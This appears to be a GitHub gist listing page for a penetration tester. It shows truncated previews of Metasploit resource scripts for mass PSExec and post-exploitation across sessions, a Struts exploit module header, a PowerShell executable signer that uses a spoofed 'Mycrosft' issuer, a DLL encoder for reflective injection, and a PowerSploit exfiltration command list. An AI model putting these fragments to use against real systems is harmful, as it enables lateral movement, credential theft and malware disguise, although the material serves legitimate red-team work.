Chris Gates carnal0wnage

twitter: @carnal0wnage talks: http://www.slideshare.net/chrisgates blog: http://carnal0wnage.attackresearch.com/

carnal0wnage / run_post_all_sessions.rb

Created February 27, 2016 14:52

run a metasploit post module against all active sessions

	<ruby>
	framework.sessions.each do \|num\|
	run_single("set SESSION #{num}")
	print_status("Running #{active_module.fullname} against session #{num}")
	run_single("exploit -j")
	sleep 1
	end
	</ruby>

carnal0wnage / rapid_fire_psexec_servicename.rb

Last active May 7, 2018 00:22

Rapid Fire PSExec resource script uses service name instead of port number

	<ruby>
	hosts = []
	begin
	framework.db.services.each do \|service\|
	if ( service.name =~ /smb/i and service.state == 'open' and service.proto == 'tcp')
	hosts << {'ip' => service.host.address}
	end
	end
	end

carnal0wnage / rapid_fire_psexec_portnum.rb

Last active July 13, 2016 00:29

Rapid Fire PSExec resource script uses port number instead of service name

	<ruby>
	hosts = []
	begin
	framework.db.services.each do \|service\|
	if ( service.port ==445 and service.state == 'open' and service.proto == 'tcp')
	hosts << {'ip' => service.host.address}
	end
	end
	end

carnal0wnage / struts_default_action_mapper_roomwizard.rb

Created November 20, 2015 15:34

Exploit Module for roomwizard II Apache struts vulnerability

	##
	# This module requires Metasploit: http//metasploit.com/download
	# Current source: https://github.com/rapid7/metasploit-framework
	##

	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

carnal0wnage / signer.ps1

Created October 27, 2015 08:56

Create a Self-Signed Executable - Without Makecert.exe

	function Invoke-CreateCertificate([string] $certSubject, [bool] $isCA)
	{
	$CAsubject = $certSubject
	$dn = new-object -com 'X509Enrollment.CX500DistinguishedName'
	$dn.Encode( 'CN=' + $CAsubject, $dn.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
	#Issuer Property for cleanup
	$issuer = 'Mycrosft'
	$issuerdn = new-object -com 'X509Enrollment.CX500DistinguishedName'
	$issuerdn.Encode('CN=' + $issuer, $dn.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
	# Create a new Private Key

carnal0wnage / http_version_vhost.rb

Created August 16, 2015 13:15

metasploit resource script to use a list of hostnames, run http modules and set the VHOST as well

	<ruby>

	#variables
	maxjobs = 5 #throttling if we get too much jobs

	#default to 15 Threads
	if (framework.datastore['THREADS'] == nil)
	run_single("setg THREADS 5")
	end

carnal0wnage / gist:6f9debf11abcc9a5bf0a

Last active September 11, 2018 18:53

##"DevOops & How I Hacked You"##

Ken Johnson @cktricky

Devops Days Washington DC 12 June 2015

carnal0wnage / msgrpc_ssh_version.py

Last active April 19, 2020 14:22

python script to connect to a metasploit msgrpc instance, setup and run an auxilary module.

	#!/usr/bin/env python
	import sys
	import msfrpc
	import time

	if __name__ == '__main__':
	# Create a new instance of the Msfrpc client with the default options
	client = msfrpc.Msfrpc({})

	# Login to the msf server using the password "abc123"

carnal0wnage / DllByteEncode.ps1

Last active September 18, 2017 16:17 — forked from sixdub/DllByteEncode.ps1

	function Invoke-DllByteEncode
	{
	#Encoder used to take a dll and turn it into a base64 encoded byte array for Powersploit's
	#Invoke-ReflectivePEInjection
	Param(
	[Parameter(Position = 0)]
	[String]
	$InputPath,
	[Parameter(Position = 1)]
	[String]

carnal0wnage / gist:73ccc44c5b8fc5c53fcb

Last active August 16, 2016 10:27

PowerSploit Exfiltration Examples Documentation

	PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Command -Module Exfiltration

	CommandType Name ModuleName
	----------- ---- ----------
	Function Get-GPPPassword Exfiltration
	Function Get-Keystrokes Exfiltration
	Function Get-TimedScreenshot Exfiltration
	Function Get-VaultCredential Exfiltration
	Function Get-VolumeShadowCopy Exfiltration
	Function Invoke-CredentialInjection Exfiltration